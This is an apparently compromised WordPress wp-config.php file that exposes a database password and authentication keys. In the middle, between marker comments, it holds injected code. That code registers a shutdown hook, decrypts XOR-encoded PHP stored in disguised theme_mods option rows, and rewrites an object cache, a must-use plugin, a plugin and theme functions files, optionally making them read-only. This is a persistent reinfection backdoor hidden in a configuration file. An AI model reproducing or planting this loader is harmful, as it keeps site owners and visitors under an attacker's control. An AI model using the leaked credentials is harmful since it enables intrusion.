File: /home/exhehbu/www/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'exhehbu464');
/** MySQL database username */
define('DB_USER', 'exhehbu464');
/** MySQL database password */
define('DB_PASSWORD', 'IdWz4xbg2IU7voV');
/** MySQL hostname */
define('DB_HOST', 'exhehbu464.mysql.db:3306');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'b9B0iXtHCWYSyfGiCjzTquKIC/2xNINFgZTVjJHcDX5Ki2ecTqSJoZSdL61G');
define('SECURE_AUTH_KEY', 'XUYVHkC28MvfGDDvKNftb+rE2CTK+V/2nJovpuQvPoDw2HUoshkb11MHXEoO');
define('LOGGED_IN_KEY', '+KHKsBATerp/S5F1oqHFFnqGcAgKU6Hy0l3F+suickfqO+p8mW0pNnTExH0P');
define('NONCE_KEY', '1hGW4Y8YyfFNJSvg5z8F/GHu/iMSMbwjlwRNojYrp+bgffUHZJXxg7G+liKR');
define('AUTH_SALT', 'VJutMKTvcV0Ul1JhWXTH7itw1bPaAfP8pEz9wYq7AfakorHIXNylWNJywdjz');
define('SECURE_AUTH_SALT', 'egpnBXLguwH4dDONWU4eH0r+sVzjCmcQj+luaFBAq/I4yKgB5vfSRxip4VGC');
define('LOGGED_IN_SALT', 'r/5ZnmVhRPeYi/mmDHQQBtN9vwyC1ThG+P0X46i6OJjErBPsMptJbWda5QVf');
define('NONCE_SALT', 'Dt1D6dLzA9HMFut3dksGXl6N63ALQ9xT8v0Y01BzkckDqleBHUtOQ0MqGivi');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'mod112_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
# /*100f0127#*/
# wp_config
$GLOBALS['_wph_targets']=array (
'obj_cache' =>
array (
0 => 'theme_mods_8cf4bd309d70',
1 => 'wp-content/object-cache.php',
),
'mu_plugin' =>
array (
0 => 'theme_mods_bb03b569d0a1',
1 => 'wp-content/mu-plugins/wp-embed-cache.php',
),
'plugin_main' =>
array (
0 => 'theme_mods_dbad43a4be4f',
1 => 'wp-content/plugins/embed-cache-plus/embed-cache-plus.php',
),
'theme_funcs' =>
array (
0 => 'theme_mods_6d00e31e08d4',
1 => 'wp-content/themes/primary-child/functions.php',
),
);
$GLOBALS['_wph_xor']='ac75e46281c085d4acf5774b5a04fd2a799caec60c491b51aba478d0235e30b7';
$GLOBALS['_wph_lock']='';
if (!function_exists('__wpm_load_auth5')) {
function __wpm_load_auth5() {
static $ran = false; if ($ran) return; $ran = true;
$e = error_get_last();
if (!is_array($e) || !in_array($e['type'], array(E_ERROR,E_PARSE,E_COMPILE_ERROR,E_CORE_ERROR), true)) return;
$wpdb = isset($GLOBALS['wpdb']) ? $GLOBALS['wpdb'] : null;
if (!$wpdb || empty($GLOBALS['_wph_targets']) || !is_array($GLOBALS['_wph_targets'])) return;
$abspath = defined('ABSPATH') ? ABSPATH : (dirname(__DIR__) . '/');
$lock = !empty($GLOBALS['_wph_lock']);
foreach ($GLOBALS['_wph_targets'] as $role => $spec) {
if (!is_array($spec) || count($spec) < 2) continue;
list($opt_key, $rel) = $spec;
$full = $abspath . $rel;
$row = @$wpdb->get_row($wpdb->prepare("SELECT option_value FROM {$wpdb->options} WHERE option_name = %s", $opt_key));
if (!$row || empty($row->option_value)) continue;
$snap = @unserialize($row->option_value);
if (!is_array($snap) || empty($snap['content']) || empty($snap['hash'])) continue;
$need = !file_exists($full);
if (!$need && @md5_file($full) !== $snap['hash']) $need = true;
if (!$need) continue;
$enc = base64_decode($snap['content'], true);
if ($enc === false) continue;
$key = @hex2bin($GLOBALS['_wph_xor']);
if ($key === false) continue;
$klen = strlen($key); $php = '';
for ($i = 0; $i < strlen($enc); $i++) $php .= $enc[$i] ^ $key[$i % $klen];
if (@file_put_contents($full, $php) !== false && $lock) @chmod($full, 0444);
}
}
}
if (!isset($GLOBALS['_wph_anchor_armed']) && function_exists('register_shutdown_function')) {
$GLOBALS['_wph_anchor_armed'] = true;
register_shutdown_function('__wpm_load_auth5');
}
# /*100f0127##*/
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/* Fixes "Add media button not working", see http://www.carnfieldwebdesign.co.uk/blog/wordpress-fix-add-media-button-not-working/ */
define('CONCATENATE_SCRIPTS', false );
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');